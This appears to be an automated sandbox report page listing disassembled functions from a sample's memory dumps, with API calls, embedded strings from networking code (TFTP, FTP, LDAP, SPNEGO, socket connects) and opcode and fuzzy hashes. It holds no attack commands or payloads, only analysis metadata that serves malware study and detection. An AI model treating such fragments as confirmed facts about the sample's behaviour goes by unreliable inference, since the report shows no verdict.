    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$CheckStackVars@8_strrchrsendto$Failure_strlen_strncpy
    • String ID: 7$Received ACK for block %d, expecting %d$tftp_tx: giving up waiting for block %d ack
    • API String ID: 1536197400-4006335497
    • Opcode ID: 04bbeb81e773fbf80996638651df9c9f747a3bbbe194b0e09619e682cccd8844
    • Instruction ID: 3d9abaaf994e5c0265a32093e266b5a598e9de99d362c63642e81a9fb9b3a309
    • Opcode Fuzzy Hash: 04bbeb81e773fbf80996638651df9c9f747a3bbbe194b0e09619e682cccd8844
    • Instruction Fuzzy Hash: AEB12BB5A00204EFCB48DF44C895EEA77B6BF88354F1482A8F9495F352D735EA81CB94
    Function 006D6E98 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 099e153fec326c1038b840983a1706d7c806df3ec282136028de23fefa57fe32
    • Instruction ID: 14824d5b4e5b948c1dfa17c4178bd0e3690a68caff03755130626afb92f18338
    • Opcode Fuzzy Hash: 099e153fec326c1038b840983a1706d7c806df3ec282136028de23fefa57fe32
    • Instruction Fuzzy Hash: E3C1D270E082499FDB15DF98DC81BADBBB2BF49300F04425EF514AB392D7349A45CB66
    Function 006A26A0 Relevance: 13.8, APIs: 9, Instructions: 300COMMON
    Download Yara Rule
    APIs
    • _strstr.LIBCMT ref: 006A26F0
    • ___from_strstr_to_strchr.LIBCMT ref: 006A2737
    • _strrchr.LIBCMT ref: 006A2768
    • ___from_strstr_to_strchr.LIBCMT ref: 006A2785
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ___from_strstr_to_strchr$Failure_strrchr_strstr
    • String ID:
    • API String ID: 1856706798-0
    • Opcode ID: 17553af1c06be76d89ca076c802fbea12f822e7c69dc0274fd1538508dedcfa2
    • Instruction ID: b9b2d6acd0fb36edcf6a23dc2e7d32492d819a5c6e6ee03f01ddddb10808c5e8
    • Opcode Fuzzy Hash: 17553af1c06be76d89ca076c802fbea12f822e7c69dc0274fd1538508dedcfa2
    • Instruction Fuzzy Hash: DFC192B0D0011ADBDB14EFA8D8A5BFEBBB2AF46304F148069E5116B341D6399E85CF90
    Function 006E1273 Relevance: 13.7, APIs: 9, Instructions: 200COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 855f75a9283e3fecd5322c24c7af7d578e9503724f65318a845de7e334858817
    • Instruction ID: 95a1c38d2452ccafb77cb3fc35ee3ee991b1329c4f424ff465a7e11ecd40b547
    • Opcode Fuzzy Hash: 855f75a9283e3fecd5322c24c7af7d578e9503724f65318a845de7e334858817
    • Instruction Fuzzy Hash: 2F610072900341DFDB20DF65C881BAAB7EAAF45710F20416EE955EF382EB70AD419B60
    Function 00664B90 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 336COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00664570: @_RTC_CheckStackVars@8.LIBCMT ref: 0066473D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 00665087
    Strings
    • Trying %s:%ld..., xrefs: 00664CBC
    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00664C80
    • Immediate connect fail for %s: %s, xrefs: 0066501D
    • 4', xrefs: 00664FE0
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Trying %s:%ld...$4'$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
    • API String ID: 930174750-4073160896
    • Opcode ID: 935d6cbae05d7d2bcdd1c8bb332485679cf0f736df5e79313d811e57b800f16e
    • Instruction ID: 64d9d50881f5190b271f3a5931e39ea362641bb69c4d3f1e38662f1f725737b7
    • Opcode Fuzzy Hash: 935d6cbae05d7d2bcdd1c8bb332485679cf0f736df5e79313d811e57b800f16e
    • Instruction Fuzzy Hash: 52E17E75A00228DFDB64DF14DC45BEAB7B6AF46304F0481D8E54D9B242DB319E85CF92
    Function 006840D0 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 260COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %c%c%c%c$%c%c%c=$%c%c==$Hhg
    • API String ID: 1951014933-557099382
    • Opcode ID: 4d6826f78a77ac1103817559cfd1f7b1f44b4e45015ad8efb5a917d9ceae92f1
    • Instruction ID: 78dad61f675349eb05d2aec93dbd09742dcddc3f69df71cc79f62f6e5712f142
    • Opcode Fuzzy Hash: 4d6826f78a77ac1103817559cfd1f7b1f44b4e45015ad8efb5a917d9ceae92f1
    • Instruction Fuzzy Hash: 3AB107B0E042598BEB04DF68D8517FE7BB2EF45300F148279E851AB381D679DA81CBA1
    Function 0069B2E0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0069B180: @_RTC_CheckStackVars@8.LIBCMT ref: 0069B2A5
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661F74
      • Part of subcall function 00661F00: _strlen.LIBCMT ref: 00661FCC
      • Part of subcall function 00661F00: @_RTC_CheckStackVars@8.LIBCMT ref: 00661FFA
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069B4A0
      • Part of subcall function 00662050: _strlen.LIBCMT ref: 006620BD
      • Part of subcall function 00662050: @_RTC_CheckStackVars@8.LIBCMT ref: 0066217B
    Strings
    • Ctrl conn has data while waiting for data conn, xrefs: 0069B451
    • There is negative response in cache while serv connect, xrefs: 0069B3B2
    • Accept timeout occurred while waiting server connect, xrefs: 0069B370
    • Checking for server connect, xrefs: 0069B351
    • Error while waiting for server connect, xrefs: 0069B40E
    • Ready to accept data connection from server, xrefs: 0069B430
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8$_strlen
    • String ID: Accept timeout occurred while waiting server connect$Checking for server connect$Ctrl conn has data while waiting for data conn$Error while waiting for server connect$Ready to accept data connection from server$There is negative response in cache while serv connect
    • API String ID: 572576967-3883132819
    • Opcode ID: 35169ea4e852a893846698f1c9e4fc58ed7bfcfde6d26633462b8d46f654c601
    • Instruction ID: b42843ff054326275dd8237c96e5ef6b1caa14da757fe7feca9ef9decc0f12d6
    • Opcode Fuzzy Hash: 35169ea4e852a893846698f1c9e4fc58ed7bfcfde6d26633462b8d46f654c601
    • Instruction Fuzzy Hash: CE51E5B5E00208EBCF04DF98EA81BEE77BBEB44700F108129F405AB796D7759A41DB91
    Function 00636700 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 118COMMON
    Download Yara Rule
    APIs
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636740
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636762
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636782
    • __Getctype.LIBCPMT ref: 0063681B
    • std::_Facet_Register.LIBCPMT ref: 0063683A
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636852
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
    • String ID: ?qo
    • API String ID: 1102183713-996102081
    • Opcode ID: ba05b99e1a8650d7f48ae03ce2a671339943dcc9fe7d08dad00ee8bdec4a1bcd
    • Instruction ID: bb6b011e718eb06f3cf5578b794dc9b81be63486ed3ddc20019c018fb7f38066
    • Opcode Fuzzy Hash: ba05b99e1a8650d7f48ae03ce2a671339943dcc9fe7d08dad00ee8bdec4a1bcd
    • Instruction Fuzzy Hash: 8C41C071A00205EFCB11DF58C841AAABBB6EB14714F14C26DE8459B392EB31BD41CBD5
    Function 006663C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114networkCOMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckCleanupStackStartupVars@8
    • String ID: if_nametoindex$iphlpapi.dll
    • API String ID: 1294282189-3097795196
    • Opcode ID: 0c65912690e693e67dc5a1196f514da2d8dfe25e2a4605f7ba448f1c20598551
    • Instruction ID: d2f69a8978285c72a8e290a19c56f263746234dc68d2f30b86cbab187c9a5417
    • Opcode Fuzzy Hash: 0c65912690e693e67dc5a1196f514da2d8dfe25e2a4605f7ba448f1c20598551
    • Instruction Fuzzy Hash: 5E411B71A00234DFE760AB18FC467F976B7DB41700F008169F449AB291DB794EC0CB92
    Function 0068E69A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
    Download Yara Rule
    APIs
    • #79.WLDAP32(00000000), ref: 0068E6DD
    • #200.WLDAP32(00000000), ref: 0068E701
    • #301.WLDAP32(00000000,00000000), ref: 0068E71F
    • #79.WLDAP32(00000000), ref: 0068E762
    • #200.WLDAP32(00000000), ref: 0068E786
    • #301.WLDAP32(00000000,00000000), ref: 0068E7A4
    • #79.WLDAP32(00000000), ref: 0068EB22
    • #200.WLDAP32(00000000), ref: 0068EB46
    • #41.WLDAP32(00000000), ref: 0068EBD0
    • #46.WLDAP32(00000000), ref: 0068EC1D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068EC69
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: #200$#301$CheckStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 864918980-741417676
    • Opcode ID: 0f93cc2fb08e34c87ec355eab725b376fa43bb3e52fa754c5d655a036f42ead2
    • Instruction ID: 3b6e766062415734981c0557529e0c5551c0a63df95224ad164c785b3a138ced
    • Opcode Fuzzy Hash: 0f93cc2fb08e34c87ec355eab725b376fa43bb3e52fa754c5d655a036f42ead2
    • Instruction Fuzzy Hash: 3741D2B1D00214ABDF24FBA8EC46BDD7376AB05314F144328F919372D2DA366E80CB96
    Function 0068E3F8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107COMMON
    Download Yara Rule
    APIs
    Strings
    • There are more than %d entries, xrefs: 0068EBEE
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: #200$CheckFailureStackVars@8_strlen
    • String ID: There are more than %d entries
    • API String ID: 3109384284-741417676
    • Opcode ID: 82679db345273812d268d9b12af24b22004be2ba80314913ab99939d5a7dfcf4
    • Instruction ID: b2ae5615ec3bf869adb392b776b95456cfe4d91daa9982d6bdc9084aacd6d7c3
    • Opcode Fuzzy Hash: 82679db345273812d268d9b12af24b22004be2ba80314913ab99939d5a7dfcf4
    • Instruction Fuzzy Hash: F231D1B1D00214DFCF20EBA8EC46BDDB376AF49314F148369E91977291DA355E80CBA6
    Function 0066D3E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON
    Download Yara Rule
    APIs
    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0067E522,?), ref: 0066D412
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D434
    • __allrem.LIBCMT ref: 0066D454
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0066D477
    • GetTickCount.KERNEL32 ref: 0066D483
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066D4E3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CheckCountCounterPerformanceQueryStackTickVars@8__allrem
    • String ID: "g
    • API String ID: 1302298639-3212855092
    • Opcode ID: d43d44c790a13397a8be361f60fa82790224645e069651809ed0c7714819551a
    • Instruction ID: 19e3f04b1ba0e4832e1074a091d03e9ce7a189c1f86bff6b0b7b1c4c590d00a0
    • Opcode Fuzzy Hash: d43d44c790a13397a8be361f60fa82790224645e069651809ed0c7714819551a
    • Instruction Fuzzy Hash: 1331D2B1E001159FD744DB99DC51EEEB7FAEB8C300F14822DF509A7361DB74A9408BA4
    Function 006E07EE Relevance: 12.2, APIs: 8, Instructions: 203COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _free$___from_strstr_to_strchr
    • String ID:
    • API String ID: 3409252457-0
    • Opcode ID: d438cc183548ee31baf4017d9e7f05fe7e570b923855dcc76c2d864cea3cc776
    • Instruction ID: da5e71ada7d0a73a4f7612a91fe4d8d9c6e12c1a48e11244c884b38342dd1d4e
    • Opcode Fuzzy Hash: d438cc183548ee31baf4017d9e7f05fe7e570b923855dcc76c2d864cea3cc776
    • Instruction Fuzzy Hash: A7510A71D05389AFFB10AFBA9851ABE77A6EF01310F10416EE51097383DBB58981CB95
    Function 006527A0 Relevance: 12.2, APIs: 8, Instructions: 150networkCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0067D6D0: getaddrinfo.WS2_32(?,?,?,?), ref: 0067D720
      • Part of subcall function 0067D6D0: @_RTC_CheckStackVars@8.LIBCMT ref: 0067D977
    • WSAGetLastError.WS2_32 ref: 00652816
    • WSAGetLastError.WS2_32 ref: 00652829
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    • EnterCriticalSection.KERNEL32(?), ref: 00652865
    • LeaveCriticalSection.KERNEL32 ref: 00652883
    • send.WS2_32(000000FF,00000001,00000001,00000000), ref: 006528ED
    • WSAGetLastError.WS2_32 ref: 00652900
    • LeaveCriticalSection.KERNEL32(?), ref: 00652925
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065293E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CriticalErrorLastSection$CheckLeaveStackVars@8$EnterFailuregetaddrinfosend
    • String ID:
    • API String ID: 3366018236-0
    • Opcode ID: 720431268a666bce7020e844d86fc9f57535349fa9942334f814da3d58c2bb89
    • Instruction ID: 6f59f0ab64f43444708a10ceed6d4eb7faf22ac3f4eaa22a8044a9ce9f683afa
    • Opcode Fuzzy Hash: 720431268a666bce7020e844d86fc9f57535349fa9942334f814da3d58c2bb89
    • Instruction Fuzzy Hash: D051B171E00204AFCB54EF98D895BDDBBB7AF49310F514168E849AB351CB34AE85CBD1
    Function 0065CE80 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 467COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065D491
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckFailureStackVars@8
    • String ID: $%s://%s$file$file
    • API String ID: 1096530042-3994756935
    • Opcode ID: 63ec236e639ea485d746f7c138794ebe76adf1f4144a2947387fe96a429413c2
    • Instruction ID: 4cd8704ce5c3c01e7e5a63f12154abf4e8b73d74d7cd3375dd3b4ec6b0a716e5
    • Opcode Fuzzy Hash: 63ec236e639ea485d746f7c138794ebe76adf1f4144a2947387fe96a429413c2
    • Instruction Fuzzy Hash: 6C124CB5A00208EFEB24DF94C855BEE77B2AF44305F148179ED096B382D735AA85CF91
    Function 006AF330 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 419COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006AF894
    Strings
    • InitializeSecurityContext failed: %s, xrefs: 006AF7B9
    • CompleteAuthToken failed: %s, xrefs: 006AF853
    • Negotiate, xrefs: 006AF50C
    • SPNEGO handshake failure (empty challenge message), xrefs: 006AF5BB
    • Negotiate, xrefs: 006AF3DB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: CompleteAuthToken failed: %s$InitializeSecurityContext failed: %s$Negotiate$Negotiate$SPNEGO handshake failure (empty challenge message)
    • API String ID: 930174750-3887576622
    • Opcode ID: b3b32482c085789d7c7ea1286a19effc71d1234e8b65b55378e7718a80bc54f6
    • Instruction ID: 092649e206625810f089217db5d647e18a1c9a6c0b8549a213c002602e00b32b
    • Opcode Fuzzy Hash: b3b32482c085789d7c7ea1286a19effc71d1234e8b65b55378e7718a80bc54f6
    • Instruction Fuzzy Hash: AE027171A00208DFDB54EF54C891BEAB7B6FB49304F158268E809AB391D779ED85CF81
    Function 0068F0F0 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 387COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0068F2B8
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068F5A5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: LDAP$Z
    • API String ID: 88142382-1365892505
    • Opcode ID: ee16ef244778e4a6f44e3ebb23d59b3a820c1bd739bfbd7be165aabf23973cb4
    • Instruction ID: a3ac39d31c5e20067bdfa145f9dda4a7bfe7a225b82d78bb18e1f55f46667a45
    • Opcode Fuzzy Hash: ee16ef244778e4a6f44e3ebb23d59b3a820c1bd739bfbd7be165aabf23973cb4
